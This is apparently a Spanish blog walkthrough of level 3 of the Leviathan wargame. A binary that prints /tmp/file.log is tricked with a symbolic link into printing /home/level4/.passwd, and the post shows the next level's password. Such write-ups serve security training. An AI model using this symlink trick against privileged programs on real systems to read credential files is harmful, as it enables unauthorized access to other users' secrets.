systemadmin.es > Seguridad > Wargame leviathan: nivel 3

Wargame leviathan: nivel 3

En este nivel vamos a ver como engañar a un binario para que lea el fichero que nos interese.

Al entrar al nivel vemos el fichero /wargame/prog que nos devuelve:

level3@leviathan:~$ /wargame/prog 
Cannot find /tmp/file.log

Si creamos un fichero llamado /tmp/file.log nos lo muestra por pantalla:

level3@leviathan:~$ echo hola > /tmp/file.log
level3@leviathan:~$ /wargame/prog 
hola

Por lo tanto con un simple link al fichero que nos interesa obtenemos la contraseña del siguiente nivel:

level3@leviathan:~$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:~$ /wargame/prog
R0gBtSP5

Otros niveles de este wargame:

Deja un comentario:

XHTML - Tags permitidos:<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>